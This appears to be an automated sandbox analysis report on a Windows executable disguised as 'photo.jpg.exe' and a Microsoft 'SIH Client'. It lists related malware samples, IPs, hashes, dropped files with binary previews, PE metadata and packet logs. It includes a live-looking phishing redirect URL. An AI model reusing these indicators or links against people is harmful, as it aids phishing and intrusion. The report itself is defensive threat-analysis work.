                  -Lysisfinancial_Executives_Schedule 6cLKF4B .svgGet hashmaliciousHTMLPhisherBrowse
                  • 108.138.106.59
                  http://daugavpils.pilseta24.lv/linkredirect/?link=https%3A%2F%2Fmujicconstruction.com%2Fjustdoitforyou%2F123%2FbGF1cmEuYmVyZ21hbkBwb3N0bm9yZC5jb20=&referer=daugavpils.pilseta24.lv%2Fzina%3Fslug%3Deccal-briketes-un-apkures-granulas-ar-lielisku-kvalitati-pievilcigu-cenu-videi-draudzigs-un-izd-8c175fc171&additional_params=%7B%22company_orig_id%22%3A%22267661%22%2C%22object_country_id%22%3A%22lv%22%2C%22referer_layout_type%22%3A%22SR%22%2C%22bannerinfo%22%3A%22%7B%5C%22key%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%7C2020-09-11%7C2021-08-23%7Cdaugavpils+p24+lielais+baneris%7Chttps%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%7C%7Cupload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%7Clva%7C267661%7C980%7C90%7C%7C0%7C0%7C%7C0%7C0%7C%5C%22%2C%5C%22doc_count%5C%22%3A1%2C%5C%22key0%5C%22%3A%5C%22%5C%5C%5C%22Apbed%5C%5Cu012b%5C%5Cu0161anas+nams-krematorija%5C%5C%5C%22%2C+SIA%5C%22%2C%5C%22key1%5C%22%3A%5C%222020-09-11%5C%22%2C%5C%22key2%5C%22%3A%5C%222021-08-23%5C%22%2C%5C%22key3%5C%22%3A%5C%22daugavpils+p24+lielais+baneris%5C%22%2C%5C%22key4%5C%22%3A%5C%22https%3A%5C%5C%5C%2F%5C%5C%5C%2Fwww.krematorijariga.lv%5C%5C%5C%2F%5C%22%2C%5C%22key5%5C%22%3A%5C%22%5C%22%2C%5C%22key6%5C%22%3A%5C%22upload%5C%5C%5C%2F267661%5C%5C%5C%2Fbaners%5C%5C%5C%2F1184_krematorija_980x90.gif%5C%22%2C%5C%22key7%5C%22%3A%5C%22lva%5C%22%2C%5C%22key8%5C%22%3A%5C%22267661%5C%22%2C%5C%22key9%5C%22%3A%5C%22980%5C%22%2C%5C%22key10%5C%22%3A%5C%2290%5C%22%2C%5C%22key11%5C%22%3A%5C%22%5C%22%2C%5C%22key12%5C%22%3A%5C%220%5C%22%2C%5C%22key13%5C%22%3A%5C%220%5C%22%2C%5C%22key14%5C%22%3A%5C%22%5C%22%2C%5C%22key15%5C%22%3A%5C%220%5C%22%2C%5C%22key16%5C%22%3A%5C%220%5C%22%2C%5C%22key17%5C%22%3A%5C%22%5C%22%7D%22%7D&control=494d2e7146aade77cb8a9ef0fd1fd133Get hashmaliciousHTMLPhisherBrowse
                  • 13.216.34.24
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 34.249.145.219
                  invoice#U007e990121.exeGet hashmaliciousFormBookBrowse
                  • 13.248.169.48
                  na.elfGet hashmaliciousPrometeiBrowse
                  • 34.249.145.219
                  https://polarservicecenters.comGet hashmaliciousUnknownBrowse
                  • 18.238.49.38
                  Re Automatic reply building project plan.msgGet hashmaliciousHTMLPhisherBrowse
                  • 18.217.16.159
                  nqa3yj3p7N.exeGet hashmaliciousVidarBrowse
                  • 18.238.49.124
                  socatGet hashmaliciousUnknownBrowse
                  • 34.249.145.219

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  3b5074b1b5d032e5620f69f9f700ff0eRequest For RFQ-STACK120774-Handel GmbH 253736803-2024.7zGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                  • 3.5.150.219
                  Zapytanie AXCES PRODUCTION SP. Z O.O32523624522523514Birkeses.cmdGet hashmaliciousRemcos, GuLoaderBrowse
                  • 3.5.150.219
                  Purchase order0204.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                  • 3.5.150.219
                  ZPZ1v1jD1L.ps1Get hashmaliciousVidarBrowse
                  • 3.5.150.219
                  mymindtpgnme.txt.ps1Get hashmaliciousUnknownBrowse
                  • 3.5.150.219
                  700815a50547b01b29cf3a1ca55d7a7e3058e7d911072018.html.ps1Get hashmaliciousLummaC StealerBrowse
                  • 3.5.150.219
                  Request For RFQ-STACK120774-Handel GmbH 253736803-2024.jsGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                  • 3.5.150.219
                  F5xfA5bLBN.exeGet hashmaliciousLummaC StealerBrowse
                  • 3.5.150.219
                  Request For RFQ-STACK120774-Handel GmbH 253736803-2024.jsGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                  • 3.5.150.219
                  s-hell.ps1Get hashmaliciousUnknownBrowse
                  • 3.5.150.219

                  Dropped Files

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exeSIH Client.exeGet hashmaliciousUnknownBrowse
                    SIH Client.exeGet hashmaliciousUnknownBrowse
                      SIH Client.exeGet hashmaliciousUnknownBrowse
                        SIH Client.exeGet hashmaliciousUnknownBrowse
                          picture_20250316.exe.bin.exeGet hashmaliciousUnknownBrowse
                            picture_20250316.exe.bin.exeGet hashmaliciousUnknownBrowse
                              #U56fe#U7247_20250218.exeGet hashmaliciousNitolBrowse
                                #U56fe#U7247_20250218.exeGet hashmaliciousNitolBrowse

                                  Created / dropped Files

                                  C:\Users\Public\Documents\hjykaiv2.lnk

                                  Download File
                                  Process:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Wed Apr 2 13:23:07 2025, mtime=Wed Apr 2 13:23:10 2025, atime=Wed Apr 2 13:23:09 2025, length=995560, window=hide
                                  Category:dropped
                                  Size (bytes):1125
                                  Entropy (8bit):4.921576202840761
                                  Encrypted:false
                                  SSDEEP:24:8m3VPa3yUAgcpAMpAk0uiS6gcrFgclFxgOqygm:8m3VP2XrMql4QuiiLyg
                                  MD5:9422EB2976709CE6BDDB65101E8947B5
                                  SHA1:720D1EC857D0C0BACF8C2D9E8C3CD96FF5C30B89
                                  SHA-256:594E1C5FD2218B1D86FF4C4C032D9DB672911FE72D3007D3B317DB019C910F5D
                                  SHA-512:C0817C77DA10821BDE081EF598E762CFB4F448BE1F31BACC308E56850E6AB772AA7BD60EB9083BEF73B600B3CF2782B4B0558B48D6A65F888AED8AC302A62496
                                  Malicious:false
                                  Reputation:low
                                  Preview:L..................F.... ...).....................0......................f.:..DG..Yr?.D..U..k0.&...&.......bBDj.....^....m..........t...CFSF..1......Z.r..BE24A5~1....t.Y^...H.g.3..(.....gVA.G..k..........Z.r.Z.r...........................lB.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2...D.f.2..0...Z.r .TASLogin.exe..J......Z.r.Z.r..........................4[..T.A.S.L.o.g.i.n...e.x.e.......q...............-.......p...................C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe..?.....\.....\.t.i.n.a.\.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2.\.T.A.S.L.o.g.i.n...e.x.e.6.C.:.\.U.s.e.r.s.\.t.i.n.a.\.b.e.2.4.a.5.a.2.-.f.6.6.3.-.4.e.9.3.-.b.e.6.2.-.2.d.c.9.9.e.b.7.c.3.1.e.0.4.2.\.........|....I.J.H..K..:...`.......X.......841675...........hT..CrF.f4... ..1.Y....0...E...hT..CrF.f4... ..1.Y....0...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.

                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\photo.jpg.exe.log

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:CSV text
                                  Category:dropped
                                  Size (bytes):1058
                                  Entropy (8bit):5.356262093008712
                                  Encrypted:false
                                  SSDEEP:24:ML9E4KlKDE4KhKiKhwE4Ty1KIE4oKNzKoZAE4KzeR:MxHKlYHKh3owH8tHo6hAHKzeR
                                  MD5:B2EFBF032531DD2913F648E75696B0FD
                                  SHA1:3F1AC93E4C10AE6D48E6CE1745D23696FD6554F6
                                  SHA-256:4E02B680F9DAB8F04F2443984B5305541F73B52A612129FCD8CC0C520C831E4B
                                  SHA-512:79430DB7C12536BDC06F21D130026A72F97BB03994CE2F718F82BB9ACDFFCA926F1292100B58B0C788BDDF739E87965B8D46C8F003CF5087F75BEFDC406295BC
                                  Malicious:true
                                  Reputation:moderate, very likely benign file
                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\bb5812ab3cec92427da8c5c696e5f731\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.edskv

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2874368
                                  Entropy (8bit):7.999934316268863
                                  Encrypted:true
                                  SSDEEP:49152:hnfYYGvuZdRPnlEwCGyzldX0ob7jYdOPbyzLp7bUItHdwQU35hQnAAEag:9YYXRfmwZI7jYdOP+L9bjHZA5WAeg
                                  MD5:44F432C76EBF0B7BA26F37CE9CC70AEA
                                  SHA1:85290D88C50EEFABA2FB46F9474D91B8E2240B89
                                  SHA-256:7F7F25BD4A4AA47755D844ACFE3C88FF9BF38B03670EB32E0888A576C0E0D6A2
                                  SHA-512:1786867556E99FCFB78D2E1DD8CBA5845B70C8C977F2CFB9D30DA315B37ADF321C60C6BBE1987782A525761D8CF9B21159003FA8F2AB6248DD2FA6D79D9AEF79
                                  Malicious:false
                                  Preview:GB$..Ob...wX.WPi.83=.\B........SJ..../lw?......-.|b4.Q.?........7J.o`..5$..D/..#s.....z.......%.........K..6B.....?..kM..p...$...n..a..i.{...u.2.F.(....x.q1..+Z.Y..ym<..BL..]~i...4.......I.Z.O....f;.m..hP...51.CH......2..(w.m=.i..[1_<.p.6>e..X.k...ps....V&.D...q.=<k....>~...9B.....pv...*.9..........V*.=..s.6 ...i......p..P../.X........_..,......s.|.r.W.O\.E.71......Sg."...[..)...LKV{;.N...z<..Y,.H..Y_9|....P.^...+#V..?Q.p...`.c........Y..|cP....g..'u..>tI..h.E.,...f.&.{>..O.C.Ow....8..4...o......t........?.!o...z.a....K;Rc.mw.0.Q..B"..$%X-........h9...T6g......0jDEo.......6...P..is.......Q.X.<.H..n}.m.}.....W.....?......$.`P......w.9.T)m.Y.]..}..f0.h]....P.....t8.....Y.,:.......).J.....J...c.d,8.~'.G.. '.......?.../......u.C.cE...-g9../&..9.."...........Mb.?9r@....Y:..Z.....X..b..<..:....<..?3...,..."z4j....17w....@Q^Y..s.....E..<.(.pd..$...[..H.....~.)..:S.68..C.K.q..:.>4...c.......?F.N.?1b....i...-..^..Q.l..~B ...\l-.#..^s..Jn.pb..#.

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):995560
                                  Entropy (8bit):7.541566176079276
                                  Encrypted:false
                                  SSDEEP:12288:nAwfG7O+2Ui8WlJZ/zMytlbd7lrUJr3m2ntRr/lT154Ny0GmhK/QgA:nAl7ji8WlrL/tlbdpwtWg9f4NyiwC
                                  MD5:7CA41E122724C2D808BF73B7A5129365
                                  SHA1:9C1A7166898F7E8CB356A16F08E1C35A3551489C
                                  SHA-256:22BC3D36AD0A6E7793399515BA29F97B7E547E23946A88EE091DF9409EA1ADEA
                                  SHA-512:A4D9D03E73A2654247B344FE5966D65B5499CE1D57F89BD696F73FA7838478B2BD717ADBDA36AD8DF952FB062C1C97C2E29878492F8C9E51914F15C8A14BA592
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 3%
                                  Joe Sandbox View:
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: SIH Client.exe, Detection: malicious, Browse
                                  • Filename: picture_20250316.exe.bin.exe, Detection: malicious, Browse
                                  • Filename: picture_20250316.exe.bin.exe, Detection: malicious, Browse
                                  • Filename: #U56fe#U7247_20250218.exe, Detection: malicious, Browse
                                  • Filename: #U56fe#U7247_20250218.exe, Detection: malicious, Browse
                                  Preview:MZ......................@...X...H.......NO{g............................!..L.!This program cannot be run in DOS mode....$........:...[.^.[.^.[.^.#i^.[.^..._.[.^..._.[.^..._.[.^..._.[.^C+._.[.^C+._.[.^.[.^.Z.^k.._.[.^k..^.[.^k.._.[.^Rich.[.^........................PE..L....L{g.................&...B......H........@....@.................................T?..........................................(.......................H'..............p...........................8...@............................................ace.....%.......................... ..`.ace....84...@...6..................@..@.ace....L............"..............@....ace.................6..............@..@.tvm0........`... .................. ..`.ace.....0..........................@..B.ace....N............4.............. ...................................................................................................................................................................................................................

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.txt

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):11
                                  Entropy (8bit):2.481714572986073
                                  Encrypted:false
                                  SSDEEP:3:JWiIG:7
                                  MD5:D476FF5557309A1349660FAB8EFC4179
                                  SHA1:4FB2E72F75A75F7CB0B47C665FEC76A66EC00B56
                                  SHA-256:CEAE30EA5C346A2467F8477A90E65E3FFFAAB4149FA01FA982430BB7985AAD53
                                  SHA-512:2ADA181D479D8BE162B0386A3D69E162AE775E689A3CC1E353CE5A621FB28DBC7EA5FC02E3656442FAF9633DB13F3EB773BE220F391D2E6D2509172EB88D225B
                                  Malicious:false
                                  Preview:593.3115.56

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLoginBase.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):13472
                                  Entropy (8bit):6.805301289944403
                                  Encrypted:false
                                  SSDEEP:192:t9illiy6iiXHVVFEQJ+KS35IVnEy2sE9jBF0NyIc4w:t9iiXVVFEQJVSJIVE8E9VF0NyI
                                  MD5:627B8BB2190258A6C4EC5D7049CFF9D8
                                  SHA1:8CF8E93B00BA6DEC18FC13D57E4C3FE303F43B7C
                                  SHA-256:97832F2274CF2CEC740F72FEB91C25FF884CF574A9F1C82D6918AF7370A358B1
                                  SHA-512:690754CABCCB40C113DF9DA3C1C26260A76D0994B96F10A8D59F7C8F67AC84E404DBF577CDFB46968658EA1FCE6A05E1D6FDDC060C351007A2BD291CF777C8AB
                                  Malicious:false
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........8U.Y;..Y;..Y;.ey)..Y;..F(..Y;.Rich.Y;.........PE..L...6..g...........!................'........ ...............................`...... ...............................p ..7.... ..(........................"...P.. .................................................... ...............................text...P........................... ..`.rdata....... ......................@..@.data...<....0......................@....]<_.........@...................... ..`.reloc.. ....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\commonbase.dll

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):2399904
                                  Entropy (8bit):6.627616917199809
                                  Encrypted:false
                                  SSDEEP:24576:xpooLM/J/G0JSNK5vn4jKx77ocnFJnhAInaM9xM5AZBmSFXP1WBS43ZNQpUu/WpS:lMVGyR4jer5bcqZ4SFXaS43mU/pGp
                                  MD5:FE96DD18C9789C78A6011B6F9821D205
                                  SHA1:6DEA627584448604D0755706BE60671661D8940E
                                  SHA-256:D59A122C30F5EB8CAF63BEC3012F1F855E5BAA1D8E84DC56556D188DBCCED4B7
                                  SHA-512:A70B7042589AE4007BA068ADF148CF82E208DC56B1CDB62B510E29139F57FF20527CFDAA461948B92396B18A4AB445F12429F72CF3C6CAD0EDBD48A6906DA3E1
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 39%
                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L...i.^d.................P .."......@j ......p ...@..........................@%.....)G%...............................!......0!..6....!..............|$.."...P"......................................................9!.`....p!......................text....3 ......4 ................. ..`.itext..X....P ......8 ............. ..`.data....W...p ..X...T .............@....bss....HY.... ..........................idata...6...0!..8.... .............@....didata......p!....... .............@....edata........!....... .............@..@.rdata..E.....!....... .............@..@.FCh..........!....... ............. ..`.rsrc.........!.......!.............@..@.reloc.......P".......!.............@..B.....................................................................................................0%......v$.............@..@........................................................

                                  C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\image.jpg

                                  Download File
                                  Process:C:\Users\user\Desktop\photo.jpg.exe
                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 522x257, components 3
                                  Category:dropped
                                  Size (bytes):6420
                                  Entropy (8bit):7.14460281799718
                                  Encrypted:false
                                  SSDEEP:192:A8ph3RzMFOli8LQS1IGuqnQ8XWapMnRC546JM+1:AIDAAzs1cnQ8XWFGM+1
                                  MD5:23E20AEC94C80E49B5EA7893443E397E
                                  SHA1:28F5F23C3087B7895F4228869B2D97326F236661
                                  SHA-256:115E72F5371B08320C02B484E112EB8A419226EB60BD81319C8109EF84D24B39
                                  SHA-512:C3E5A2A4389772014BFF01F25B4BE1AD1001B4701B9C171B96C6688ABF645D10643D357D7DC271FC6E23373955D9D84359B6C0C6736F01A61A6C2B6A2AA44A89
                                  Malicious:false
                                  Preview:......JFIF.....`.`......ICC_PROFILE............@..mntrRGB XYZ ............acsp.......................................-Qt..................................................rXYZ........gXYZ........bXYZ........wtpt...,....cprt...@....rTRC...L... gTRC...L... bTRC...L... desc...l..._XYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ .......O........text....N/A.para..........ff......Y.......[desc........sRGB..................................................................................C....................................................................C............................................................................"......................................................................................................3....;.....lc........1...@..sc.......1..lc.P.8....1.*..<.3.):...t...SF}..O>...N....&g...@...8.....'I...4g.........\.'I...4B..O>...N...t...SD.........\.'I...4B..|..V.. ...DV.Xq....V.XF...>}.XEa....XEa.r....Ea...@..............................dE..D

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                  Entropy (8bit):6.177469545788914
                                  TrID:
                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                  • DOS Executable Generic (2002/1) 0.01%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:photo.jpg.exe
                                  File size:289'438 bytes
                                  MD5:a5fb35b15c22b46a62905bf7a9f492bf
                                  SHA1:216a53be8dab4818a90044e5940cc3f13e8ab604
                                  SHA256:5727cc8ef222a2a0f24ed139bbd4de56b0f09806561074d40ed4d62e40df1ad5
                                  SHA512:16f17f102adb14d6b60402586740819f1f8f9597fc120a5bb01c74036b2dc2bb1d680dff797958b3b8e6c6312456618c34124cfb854b469d81cc164cd5c8e4bc
                                  SSDEEP:6144:PgKH/GJLaUurkNCnCnClQRKXa1vRUpyTz9kmiPZ:+JLZuTnLjXqWIV8Z
                                  TLSH:5A541818076CBE0BE58E6A33D4F1210C73B8A1B6E9D6D75614409B7D0FD13916E32BAE
                                  File Content Preview:MZ......................@...............SENS............................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........."...0..4..........d.... ...`....@.. ...............................l....`................................

                                  File Icon

                                  Icon Hash:90cececece8e8eb0

                                  Static PE Info

                                  General

                                  Entrypoint:0x431c64
                                  Entrypoint Section:.text
                                  Digitally signed:true
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x67C31B9C [Sat Mar 1 14:37:16 2025 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                  Authenticode Signature

                                  Signature Valid:
                                  Signature Issuer:
                                  Signature Validation Error:
                                  Error Number:
                                  Not Before, Not After
                                    Subject Chain
                                      Version:
                                      Thumbprint MD5:
                                      Thumbprint SHA-1:
                                      Thumbprint SHA-256:
                                      Serial:
                                      Instruction
                                      jmp dword ptr [00431C50h]
                                      add byte ptr [eax], al
                                      inc edx
                                      push ebx
                                      dec edx
                                      inc edx
                                      add dword ptr [eax], eax
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      or al, 00h
                                      add byte ptr [eax], al
                                      jbe 00007FA32471A3E6h
                                      xor byte ptr [esi], ch
                                      xor esi, dword ptr [eax]
                                      xor esi, dword ptr [ecx]
                                      cmp dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      add byte ptr [00006C00h], al
                                      add byte ptr [eax], bh
                                      scasb
                                      add byte ptr [eax], al
                                      and edi, dword ptr [esi+00h]
                                      add byte ptr [esi+ebp*4+57C40000h], ah
                                      add byte ptr [eax], al
                                      and edx, dword ptr [ebx+74h]
                                      jc 00007FA32471A41Bh
                                      outsb
                                      jnc 00007FA32471A3B3h
                                      add byte ptr [eax], al
                                      add byte ptr [eax+06h], ch
                                      add dword ptr [eax], eax
                                      adc byte ptr [eax+eax], cl
                                      add byte ptr [ebx], ah
                                      push ebp
                                      push ebx
                                      add byte ptr [eax+12h], bh
                                      add dword ptr [eax], eax
                                      adc byte ptr [eax], al
                                      add byte ptr [eax], al
                                      and eax, dword ptr [edi+55h]
                                      dec ecx
                                      inc esp
                                      add byte ptr [eax], al
                                      add byte ptr [eax-13FFFEEEh], cl
                                      sub eax, dword ptr [eax]
                                      add byte ptr [ebx], ah
                                      inc edx
                                      insb
                                      outsd
                                      bound eax, dword ptr [eax]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add al, byte ptr [eax]
                                      add byte ptr [ecx], al
                                      push edi
                                      mov edi, 1F093FA3h
                                      add byte ptr [eax], al
                                      add dl, bh
                                      add dword ptr [ebx], esi
                                      add byte ptr [esi], al
                                      add byte ptr [eax], al
                                      add dword ptr [eax], eax
                                      add byte ptr [eax], al
                                      out 00h, eax
                                      add byte ptr [eax], al
                                      add eax, 72000001h
                                      add eax, dword ptr [eax]
                                      add byte ptr [ebp-71FFFFFCh], ah
                                      add al, 00h
                                      add byte ptr [BB000000h], ch
                                      add al, byte ptr [eax]
                                      add byte ptr [ecx+65000001h], cl
                                      add byte ptr [eax], al
                                      add byte ptr [edx], cl
                                      add byte ptr [eax], al
                                      add byte ptr [ecx], dl
                                      add byte ptr [eax], al
                                      add byte ptr [B2000000h], bl
                                      add byte ptr [eax], al
                                      add byte ptr [edi], ah
                                      add byte ptr [eax], al
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x31c0c0x28.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x5a4.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x448000x2298
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x460000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x51d40x38.text
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x31c500x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x45ae00x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x43ca80x43e00d25e30f39188a0d666404a6aa7391351False0.5067729914825047data6.107152038134895IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .reloc0x460000xc0x20001502b5ef2a622b5d8a59d4254cdd621False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      .rsrc0x480000x5a40x6001222d6e65212e96828c3502edd28a10bFalse0.4388020833333333data4.553524253917224IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_VERSION0x480a00x318data0.45075757575757575
                                      RT_MANIFEST0x483b80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                      DLLImport
                                      mscoree.dll_CorExeMain
                                      DescriptionData
                                      FileVersion10.0.19041.5438
                                      ProductVersion10.0.19041.5438
                                      FileDescriptionSIH Client
                                      CompanyNameMicrosoft Corporation
                                      OriginalFilenameSIH Client
                                      ProductNameMicrosoft Windows Operating System
                                      LegalCopyright Microsoft Corporation. All rights reserved.
                                      Translation0x0000 0x04b0

                                      Network Behavior

                                      Download Network PCAP: filteredfull

                                      Network Port Distribution

                                      • Total Packets: 995
                                      • 3158 undefined
                                      • 443 (HTTPS)
                                      • 53 (DNS)
                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 2, 2025 16:22:29.078855991 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.078883886 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:29.079197884 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.092101097 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.092118979 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:29.780836105 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:29.780976057 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.785803080 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.785811901 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:29.786283970 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:29.827011108 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.865711927 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:29.908273935 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:30.483278036 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:30.483839035 CEST443496843.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:30.483917952 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:30.489665985 CEST49684443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:30.497102022 CEST49685443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:30.497143984 CEST443496853.5.150.219192.168.2.9
                                      Apr 2, 2025 16:22:30.497265100 CEST49685443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:30.497603893 CEST49685443192.168.2.93.5.150.219
                                      Apr 2, 2025 16:22:30.497612953 CEST443496853.5.150.219192.168.2.9
